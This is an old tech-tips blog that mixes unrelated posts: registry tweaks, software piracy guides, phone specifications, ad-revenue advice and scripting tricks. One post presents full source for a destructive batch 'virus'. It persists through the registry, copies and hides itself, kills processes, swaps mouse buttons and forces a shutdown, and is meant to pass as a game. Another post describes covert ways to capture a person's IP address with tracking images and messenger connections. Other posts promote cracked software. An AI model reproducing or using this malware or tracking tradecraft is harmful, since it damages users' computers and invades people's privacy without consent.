Sign Up Neobux and earn money daily and also Signup AlertPay to transfer money to your account guranted

Saturday, 25 June 2011

How to Write-Protect USB Flash Drive

Many a time, it becomes necessary for us to write protect our USB flash drive so as to protect it from viruses and other malware programs. Because flash drives are so popular and most widely used to move data between computers, they are the prime target for attackers as a means to get infections spread around the computer world. Also, since USB drive is not a Read-Only Memory (ROM), the data inside it can easily be modified or deleted by malware programs.
 
But unfortunately, most of the new flash drives do not come with a write-protect feature as the manufacturers wish to cut down the cost of production. Hence, the only way to write-protect your USB flash drives is to enable this feature on your own computer.

This can be done by adding a small entry to the Windows registry which acts as a switch that can be enabled to make use of the write protection or disabled to allow write access. Just follow these steps:


1. Open the Registry Editor (Open the “Run” dialog box, type regedit and hit “Enter”).
2. Navigate to the following Registry key:


HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ 

 3. Create a New Key named as StorageDevicePolicies. To do this right-click on Control, and click on New->Key and name it as StorageDevicePolicies.
4. Now right-click on  StorageDevicePolicies and create a New->DWORD (32-bit) Value and name it as WriteProtect.

5. Double-click on WriteProtect and set the Value data to 1.
Now the right-protection for USB drives is enabled on your computer (no restart required) and thus it would not be possible for anyone or any program to add/delete the contents from your USB flash drive. Any attempt to copy or download the files onto the USB drive will result in the following error message being displayed.

To revert and remove the write-protection, all you need to do is just change the Value data for WriteProtect (Step-5) from 1 back to 0. Now write access to all the USB devices is re-enabled.
Sometimes it may seem difficult to remember and follow the above mentioned steps each time you want to enable/disable the write protection. Hence as an alternative way, there are many tools available to automatically enable/disable the write-protection feature. One of my favorite tool is USB Write Protect by Naresh Manadhar. Using this tool you can limit write access to your USB drives with just a click of a button. You can download this tool from the following link:

How to get winrar 4.61 full version

Go To www.rarlabs.com and download winrar evalution and install it


http://www.mediafire.com/?ibc1t2f27qut2el









paste in the directory it will appear here








SYMBRECORDER V5.20 S60V3 S60V5 SYMBIAN^3

Totally new business level call recorder and; voice recorder!
 
Phone call recording automatically or manually,
Voice memo recording, make your phone as a dictaphone Most advanced beep suppression technique, 3 Beep Suppression Modes:
Mode1 Perfect quality in amr/wav format with no audio gaps, the device side will hear a beep but the other side will NOT, for newer cellphones
Mode2 Perfect quality in amr/wav format with no audio gaps, both sides will NOT hear the beep, profile will be changed before recording and recovered after recording automatically, for older cellphones
Mode3 With some loss of audio (This is tunable, so it can usually be improved) in amr format, both sides will NOT hear the beep, for all cellphones

Recording quality (amr/wav) can be adjusted by setting different Sampling Bitrate
All S60 devices even those with few keys like N8/C7/5800 can use hotkey to start/stop recording conveniently. You can choose a key from a list (21 keys including key XpressMedia and key Menu) and select a press method (PressLong/PressOnce/PressTwice/PressThrice) to act as a hotkey
Recording all calls, or some of the calls according to the Include List/Exclude List
Auto Send the clip via MMS/Email after recording
Manually send clips via MMS/Email/Bluetooth/Infrared
The clip can be stored in any drive, such as C, E, F, etc.
Total Disk Limited can be set. The oldest clips will be erased automatically when the total size of clips exceeds the setting value
Use advanced RDBMS/SQL technique to manage clips, you can add note to a certain clip, view the detailed clip information, search, play back, delete, copy and move clips conveniently and quickly
Password protection, no other program can visit your clips. You can copy/move your clips to other folders if you want to share them
Client/Server structure, the server program which runs in the background is powerful but it is really tiny (less than 60KB) with less consumption of resources
FREE Updates for the life of your device!

Friday, 24 June 2011

How to assemble a pc video step by step tutorial

How to Assemble a Computer [Video]How To Assemble A PC   Step By Step Tutorial
What to know how to assemble a desktop computer? Then this video will teach you everything all you want to know. This video will help you to begin from scratch and give step by step instructions so that you can easily understand various components of Pc and how to assemble it.

This video is a for beginner level. And it covers various CPU components and how to assemble them. You can have basic knowledge about the hardware watching this video Hw would have explained everything clearly here.

Topics covered in this tutorial

  • About CPU
  • Types of RAM
  • Hard disk
  • Graphics card details
  • CPU heatsink
  • Optical drives(DVD drives,Floppy drives)
  • Installing CPU
  • Installing Motherboard
  • Installing RAM
  • Installing SMPS
  • Installing Hard disk
  • Installing Optical drives
  • Giving cable connections
I hope this video tutorial will be useful for you. Start assembling a new computer

How to get IDM 6.06 full verison free

THIS POST IS ONLY FOR KNOWLEDGE  IT IS ILLEGAL
FOR ANY © OWNER OF THIS SITE WILL NOT BE RESPONSILE DO THIS AT YOUR OWN RISK.


Internet Download manager is used to download files from internet at high speed.It is one of the famous softwares.
Follow the steps to get IDM FULL 6.05 V:


1 Open this link then a site will open you have to know only follow these pictures.



or watch this video




follow this it is 100% work





Create your own text to speech converter software to make your computer speak whatever you type.

Steps

1. Open the Notepad.

2.Copy/Write the code as given below into the notepad.

Dim message, sapi
message=InputBox("What do you want me to say?","Speak to Me")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak message


3. Save the file with any name with an extension .vbs

4. Run the file, type anything you want in the textbox and press OK.
5. Enjoy !

TRACE MOBILE NUMBER etc.


Few days ago, I have a found a website which will help you to trace a mobile number.Eg: if enter 10 digit mobile number then we get the Mobile Service Provider name,location,city along with area its really work:
this website is http://www.indiatrace.com/
feature of the site:


1. Trace Mobile number
2. Trace Pin code
3. Trace vehicle Number
4.Trace ip address
5.Trace website WHOIS

Thursday, 23 June 2011

In many cases, it's desired to know the IP address of someone in the reconnaissance phase. The first question to ask is what information do I have about this person. In most cases it's possible that you have the email or IM of the target. First let's discuss the methods:


Method 1

if you have a web server hosted someplace where you can see its logs then it's very easy to send someone a URL of an image or any webpage hosted on your web server (http://123.123.123.123/veryfunnyimage.jpg) whenever this page is visited the web server keeps a log of who visited that page (IP address, time, browser, OS ... and lots of more info) where you can check later to collect IP addresses.

Method 2

sometimes people get freaked out from addresses that have ip addresses in the URL so having your webserver with a domain name would really help the person you sent the URL to press on the link (www.mywebsite.com/veryfunnyimage.jpg)

Method 3

Some paranoid people don't open links to unknown sites. so here comes the cool trick. you can embed the image in a post of yours in a known site that allows HTML tags with image sources like < img src = (your image URL). in this case the URL you are going to send to the person is a link to a known website but the website contains another link to your web server. And whenever someone views this page on the known website, the "img src" link is invoked and voila!, you have a log entry on your webserver.

Method 4

Some Ultra paranoid people don't open links at all!! for these people I use my old trick. I send an email to the target that looks important to him (depending on the target actually and what's important to him). This email is in HTML format and contains a tag that links to an image on my webserver (probably a white image not to attract attention). Now upon merely opening the email, my webserver is invoked and a log entry is saved about the persons current IP address.

Note that this method only works if the email client allows images to be displayed (gmail disable that by default)

Method 5

A more faster approach is IM. If you have the IM of the target, then it's possible that you try to send him a file (not malicious, a picture or smthng). upon sending the file, a direct connection is established between you and the target. with a simple connection monitoring application (e.g.netstat on windows), you can know the Ip address.
Method 6

Some paranoid people don't accept files! so another trick in case of MSN is background sharing. the default for MSN is to accept backgrounds shared by others. Actually background sharing performs file sending if the background is not one of the default backgrounds. So the trick is to set your background for the IM to a cool pic from your computer and share it. if the default setting was not altered on your target's IM, then he will automatically accept it right away and a connection is opened. here comes again the connection monitoring app where you can identify the new connection and extract the IP add of the target.


Well those are one's that I used .. do you have any other methods ?? sometimes I only have the username on a forum or website. Any clues?

Method 7

In MSN messenger, if u don't have the display picture of the person you're talking to, the messenger will try to download it by default. this cause the the MSN to open a direct connection. Using a sniffing tool like wireshark will allow you to know the IP of the remote person.So basically if you don't have his display picture and you opened the chat window you'll get your log entry. You can either convince the target to change his/her display picture or you can remove the your local directory that caches the display pictures for all contacts (located in application data folder for the msn) to force the messenger to redownload the picture

Want to Check your Antivirus whether it is working or not

Sometimes we have certain doubts that whether we our protected with our antivirus or not ?, if it is working or not ? But dont worry you can easily check your antivirus if it is working or not by this simple trick.


First of all, Open your notepad.
Now paste the following code in your notepad
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
Now save it as virus.exe (or anyname.exe).
If your antivirus detects the virus, it means your antivirus is working otherwise change your antivirus.

 

Price in market: Rs 27,000

 

BlackBerry Pearl 8120 Technical Specifications


General
StatusAvailable
IntroducedDecember 2007
AnnouncedOctober 2007
Network (2G)GSM 900 / GSM 1800 / GSM 1900 / GSM 850
Form factorBlock
Antenna typeInternal
SAR Value1.480 W/Kg
Size
Weight91 g (with battery)
Dimensions107.0 x 55.0 x 14.0 mm
Display
TypeGraphical
ColouredYes
Size240 x 320 pixels
- QWERTY keyboard
- Wallpapers
Memory
- microSD (TransFlash)
- 64 MB flash memory
Ringtones
Polyphonic ringtonesYes, 32
- MP3
Networking
GPRSYes
DATAYes, EDGE
WLANYes, Wi-Fi 802.11b/g
USBYes
BluetoothYes, 2.0
BrowserYes, HTML
Email clientYes
- Instant Messaging
Features
VibrationYes
SMSSend / Receive
MMSSend / Receive
CameraBuiltin, 2 MP, 1600x1200 pixels, video, flash
JavaYes
GamesYes, (changeable)
ClockYes
AlarmYes
CalculatorYes
CalendarYes
To-do listYes
HandsfreeYes
- Document viewer (Word, Excel, Powerpoint, PDF)
- Media player
- SureType keyboard software
- Organizer
Standard Battery
TypeLi-Ion
Amperage900 mAh
Standby timeGSM: 360h
Talk time
GSM: 4h

Change your facebook profile colour



Firstly you have to download Greasemonkey (Needs Mozilla Firefox) https://addons.mozilla.org/firefox/addon/748

Restart Firefox (close app and open again)

Download Facebook Auto Colorizer http://userscripts.org/scripts/source/3626.user.js

And your’e done!
now open your Facebook profile, and you will surely see a change!

How to run Run Mobile Games (.jar files) on PC

Do you want to run your mobile games on your PC then you should to try mpowerplayer.
Mpowerplayer is for mobile gaming. Play mobile games right on your desktop. Every game has a playable demo, and with few clicks you can buy games and send them to your mobile.
Mpowerplayer lets you run java mobile games on your computer. Mpowerplayer can  load .jar files from your hard drive and can run without any difficulty.
click to zoom

click to zoom


Download and install Mpowerplayer on your system:

  1. Download mpowerplayer from Here. It is a java file so you should have (Java Runtime Environment) installed on your system. Don’t have Java download it from here.
  2. After downloading right click on the .jnlp file and click Launch.
  3. Mpowerplayer installer will download and installs all the required files . Now run the program.

Wednesday, 22 June 2011

How to create a batch programming virus


In this post i am going to give you dangerous virus code which is written in Batch Programming language.


what this Virus can do:
1.Copy itself into startup
2.Copy itself over one thousand times into random spots in your computer.
3.Hide its self and all other created files
4.Task kill MSN, Norton, Windows Explorer, Limewire.
5.Swap the left mouse button with the right one
6.Opens alert boxes
7.Changes the time to 12:00 and shuts down the computer

copy this code into notepad and save as Greatgame.bat(while saving select all files instead of text ).
this virus is harmful be careful do this at your own risk

Here is the Code:

@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP

Saturday, 18 June 2011

Send free SMS and phone calls from PC to Mobile

SEND FREE SMS IN INDIA USING

www.way2sms.com
2. www.160by2.com


call for free anywhere in world using
1. www.evaphone.com

 2 www.tuitalk.com

REGISTER AND ENJOY!....

Thursday, 16 June 2011

How to earn money from blog and website

Friends earning money is very difficult if we are new to internet.If want to make first make a blog or website most popular sites that provide blogs is blogger and free website making is weebly or webs first signup then start making website.After it start writing contents keep in mind content should be easily understand by others.Then we need traffic we need minimum 10 thousand visiters every week you can use youtube and facebook or other social networking sites to increase your traffic.

MAKING MONEY USING TEXTUAL ADS:

1.KONTERA          Pay per click advertising
2.CHITIKA               Pay per click advertising
3.INFOLINKS        -place ads in text as link  of post
4.CLICKSOR        
i think it is best as it use popup windows ads and other all type
6.BIDVERTISER  Pay per click advertising

7. GOOGLE ADSENSE

I write google adsense last because it is difficult to participate in google adsense .As it is difficult to fulfill adsense policies -1)you should have original contents not copied from other
                                          2)you should have enough daily traffic
                                          3)your site not contain adult contents ,illegal contents,hacks/cracks etc.
                                 4) your site must at least 5 or 6 months old and you should have enoughpost at least      minimum 20 posts.

aftersubmiting your application you have to wait at least 2 workingdays for approval
IF approved after it copy the code they provide paste into your website .Higher the traffic higher the clicks on ads and higher will be the money.

NOTE:-- Don't click on ads yourself they are very clever and will find it easily and will disable your account .DONOT USE ANY ILLEGAL METHODS OF CLICKS ON ADS... KEEP IT IN MIND.